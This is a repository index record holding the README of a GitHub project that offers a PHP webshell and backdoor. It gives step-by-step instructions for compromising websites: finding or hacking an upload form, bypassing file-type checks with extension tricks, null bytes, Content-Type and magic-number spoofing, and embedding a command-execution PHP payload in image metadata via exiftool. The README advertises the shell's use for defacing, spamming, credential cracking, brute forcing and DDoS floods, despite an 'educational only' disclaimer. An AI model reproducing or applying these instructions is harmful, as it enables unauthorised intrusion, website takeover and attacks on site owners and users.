{"id":21243745,"url":"https://github.com/termuxhackz/webshell","last_synced_at":"2025-07-01T14:06:12.372Z","repository":{"id":111929788,"uuid":"448228592","full_name":"TermuxHackz/WebShell","owner":"TermuxHackz","description":"Our powerful php Webshell created by TermuxHackz Team members ","archived":false,"fork":false,"pushed_at":"2022-07-15T19:25:19.000Z","size":434,"stargazers_count":55,"open_issues_count":2,"forks_count":15,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-07-01T14:05:50.064Z","etag":null,"topics":["php-backdoor","php-webshell","php-webshell-backdoor","php-webshells","webshells"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/TermuxHackz.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2022-01-15T09:01:49.000Z","updated_at":"2025-05-30T20:35:27.000Z","dependencies_parsed_at":"2023-03-13T13:31:31.734Z","dependency_job_id":null,"html_url":"https://github.com/TermuxHackz/WebShell","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/TermuxHackz/WebShell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TermuxHackz%2FWebShell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TermuxHackz%2FWebShell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TermuxHackz%2FWebShell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TermuxHackz%2FWebShell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/TermuxHackz","download_url":"https://codeload.github.com/TermuxHackz/WebShell/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TermuxHackz%2FWebShell/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":262978551,"owners_count":23394008,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["php-backdoor","php-webshell","php-webshell-backdoor","php-webshells","webshells"],"created_at":"2024-11-21T01:13:48.627Z","updated_at":"2025-07-01T14:06:12.352Z","avatar_url":"https://github.com/TermuxHackz.png","language":"PHP","readme":"# Php-Webshell/Backdoor\n\nA PHP webshell created by us TermuxHackz Society.  For educational and/or testing purposes only. \nCan also be used for ctf challenges, which has uploader and main shell. (ths1335.php)\n\n# Note\n#### [+] Always investigate malware in a secure environment. This means: separately from your network and in a virtual machine!\n#### [+] Some backdoors may be backdoored (yes, really). Don't ever use this for any malicious purposes.\n#### [+] The backdoors follow the format: Backdoorname_SHA1.php, granted the name of the backdoor is known \n#### [+] The folder TermuxHackz Webshell contains the webshell (uploader and main shell[ths1335 shell]). \n#### [+] Dont just be a defacer alone!, do cool shits with the webshell. But can also be used for defacing\n\n# Created by\n\u003cb\u003eTermuxHackz Society Team Members - AnonyminHack5\u003c/b\u003e\n\u003cbr\u003e\u003cbr\u003e\nThs1335.php is a powerful webshell which has several and multiple features which are useful for spammers, defacers and also \nuseful for those who loves to try cool shits too haha ^_^. It contains, Fake Mailer, Whois scan, iplookup, Cracking Cpanel, Whm, Admin Panel Finder and so much more. This help bypass site security and not like other shells.\n\n# Steps to use this webshell\n```\n1) Hack the site admin panel or look for site with upload option (for uploading pics, images, etc) \n2) Look for upload section \n3) First try to upload the Tuploader.php into the site\nIf the site restricts php files, and says only png, jpeg or jpg images allowed \nThen next step is for you to upload the payload-image.png or try some file upload bypass like tuploader.pHp, tuploader.phtml etc  \n\n\nThe payload-image.png is an injected code for the php file\nSo once the png image has been successfully uploaded\nBut if the payload-image doesnt work. Use some file upload bypass tricks\n\n4) Copy the image/shell location\n5) Open in a tab\n6) Then once you see the uploader\n7) Upload the main shell which is the ths1335.php \n8) Then you can use the shell.. \n\nHahah, make sure you use with care!! \n```\n# File Upload Bypass \n\u003ch4\u003eFile Upload General Methodology\u003c/h4\u003e\nOther useful extensions:\u003cbr\u003e\n\u003cb\u003ePHP:\u003c/b\u003e .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc \u003cbr\u003e\n\u003cb\u003eASP:\u003c/b\u003e .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml \u003cbr\u003e\n\u003cb\u003eJsp:\u003c/b\u003e .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action \u003cbr\u003e\n\u003cb\u003eColdfusion:\u003c/b\u003e .cfm, .cfml, .cfc, .dbm \u003cbr\u003e\n\u003cb\u003eFlash:\u003c/b\u003e .swf \u003cbr\u003e\n\u003cb\u003ePerl:\u003c/b\u003e .pl, .cgi \u003cbr\u003e\n\u003cb\u003eErlang Yaws Web Server:\u003c/b\u003e .yaws \u003cbr\u003e\n\u003cbr/\u003e\n\u003ch3\u003eBypass file extensions checks\u003c/h3\u003e\n1) If they apply, the check the previous extensions. Also test them using some uppercase letters: \u003ccode\u003epHp, .pHP5, .PhAr ..\u003c/code\u003e \u003cbr\u003e\n2) Check adding a valid extension before the execution extension (use previous extensions also):\u003cbr\u003e\u003cbr\u003e\n\u003ccode\u003e\nfile.png.php\nfile.png.Php5\n\u003c/code\u003e\n\u003cbr/\u003e\n3) Try adding special characters at the end. You could use Burp to bruteforce all the ascii and Unicode characters. (Note that you can also try to use the previously motioned extensions) \u003cbr\u003e\n\u003cbr\u003e\n\u003ccode\u003e\nfile.php%20\u003cbr/\u003e\nfile.php%0a\u003cbr/\u003e\nfile.php%00\u003cbr/\u003e\nfile.php%0d%0a\u003cbr/\u003e\nfile.php/\u003cbr/\u003e\nfile.php.\\\u003cbr/\u003e\nfile.\u003cbr/\u003e\nfile.php....\u003cbr/\u003e\nfile.pHp5...\u003cbr/\u003e\n\u003c/code\u003e\n\u003cbr\u003e\n4) Try to bypass the protections tricking the extension parser of the server-side with techniques like doubling the extension or adding junk data (null bytes) between extensions. You can also use the previous extensions to prepare a better payload.\u003cbr/\u003e\n\u003cbr\u003e\n\u003ccode\u003e\nfile.png.php\u003cbr/\u003e\nfile.png.pHp5\u003cbr/\u003e\nfile.php%00.png\u003cbr/\u003e\nfile.php\\x00.png\u003cbr/\u003e\nfile.php%0a.png\u003cbr/\u003e\nfile.php%0d%0a.png\u003cbr/\u003e\nflile.phpJunk123png\u003cbr/\u003e\n\u003c/code\u003e\u003cbr/\u003e\n\u003cbr\u003e\n5) Add another layer of extensions to the previous check: \u003cbr/\u003e\n\u003cbr\u003e\u003ccode\u003e\nfile.png.jpg.php\nfile.php%00.png%00.jpg\n\u003c/code\u003e\n\u003cbr\u003e\n6) Try to put the exec extension before the valid extension and pray so the server is misconfigured. **(useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php** will execute code): \u003cbr\u003e\n\u003cbr\u003e\u003ccode\u003e\nex: file.php.png \n\u003c/code\u003e\n\u003cbr\u003e\n7) Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. “file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The “::$data” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. “file.asp::$data.”) \u003cbr\u003e\u003cbr\u003e\n8) Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA\u003c--SNIP--\u003eAAA.php \u003cbr\u003e\n\n```\n# Linux maximum 255 bytes\n/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255\nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png\n# Upload the file and check response how many characters it alllows. Let's say 236\npython -c 'print \"A\" * 232'\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n# Make the payload\nAAA\u003c--SNIP 232 A--\u003eAAA.php.png\n```\n\n\u003ch2\u003e Bypass Content-Type \u0026 magic number \u003c/h2\u003e\n1) Bypass Content-Type checks by setting the value of the Content-Type header to: \u003cb\u003eimage/png\u003c/b\u003e , \u003cb\u003etext/plain\u003c/b\u003e ,\u003cb\u003e application/octet-stream\u003c/b\u003e\u003cbr\u003e\n\u003cbr\u003e\n\u003e\u003e Content-Type wordlist: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt \u003cbr\u003e\n\u003cbr\u003e\n2) Bypass magic number check by adding at the beginning of the file the bytes of a real image (confuse the file command). Or introduce the shell inside the metadata: \u003cb\u003eexiftool -Comment=\"\u003c?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();\" img.jpg \u003c/b\u003e\n \u003cbr\u003e\n\nOr you can try other tricks you know that might work. Haha\n\u003c/b\u003e\n# Some features of ths1335 Shell\n1) File Manager\n2) Dumping SQL database \n3) Find admin panel page\n4) Execute ssh commands on remote server\n5) TCP and UDP flood ddos\n6) CGI Shell\n7) Ftp brute force\n8) Cracking Cpanels and Whmpanels\n9) Crack WordPress sites and change all usernames and password\n10) Code Injector\n11) And so much fuckin more hahahaha\n\n\n# Ths1335 Shell Images\n![](ths1.png)\n\n![](ths2.png)\n\n![](ths3.png) \n\n# License\nths1335.php shell is under the MIT license. This webshell is free for all use and for home and educational usages as well. Thanks to our team of skilled programmers hahaha. \n\nIncase you dont like to clone from github, haha, you can download the TermuxHackz Webshell zip from mediafire. \u003cbr\u003e\u003cbr\u003e\n\u003cstrong\u003eDownload here:- \u003ca href=\"https://www.mediafire.com/file/xmu2u6vw6mym0ov/TermuxHackz-WebShell.zip/file\" target=\"_blank\" alt=\"TermuxHackz Webshell\"\u003eDownload TermuxHackz WebShell here\u003c/a\u003e.\u003c/strong\u003e       \n\n\u003cp\u003eKindly star or fork this repo, to support us for this wonderful project \u003c/p\u003e\n\n# Donate \n![](donations.jpeg) \nDonate to us if you love and appreciate the project. Donate \u003ca href=\"https://paypal.me/kwasconcept\" target=\"_blank\"\u003ehere\u003c/a\u003e. Thanks for donations.... \n\n\n# Version\n```\nVersion 1.0\n```\n\n# Join our groups\n\u003cb\u003eJoin our Telegram group: \u003c/b\u003e \u003ca href=\"https://t.me/termuxhackz1\"\u003ehere\u003c/a\u003e\u003cbr\u003e\n\u003cb\u003e Visit our \u003ca href=\"https://termuxhackz.github.io/index.html\"\u003eSite\u003c/a\u003e\u003cbr\u003e\u003c/b\u003e\n\u003cb\u003e Join our facebook group: \u003ca href=\"https://www.facebook.com/groups/423043615428159/?ref=share\"\u003ehere\u003c/a\u003e\u003c/b\u003e\u003cbr\u003e\nJoin our telegram Channel also by scanning the qr code below \u003cbr\u003e\n\n![](images/received_1065724630950464.jpeg) \n\n# Notice Bugs? \nIf you use our webshell and you notice bugs in em feel free to email me those bugs and We will try fix them. \nReport those bugs to me \u003ca href=\"mailto:AnonyminHack5@protonmail.com\" target=\"_blank\"\u003ehere\u003c/a\u003e. \n\n\u003ch5\u003eThanks alot for the support\u003c/h5\u003e\n\n# Faqs\n##### 1) Some features doesn't work? \n\u003cstrong\u003eIf you notice that some features of the shell doesnt work, Try using a linux system with a good internet connection 📶 and try again. It should work. Using a windows system with this powerful webshell is limited. Thanks :) \u003c/strong\u003e\n\n\n\n\n\n\n\n\n \n\n\n\n","funding_links":["https://paypal.me/kwasconcept"],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftermuxhackz%2Fwebshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftermuxhackz%2Fwebshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftermuxhackz%2Fwebshell/lists"}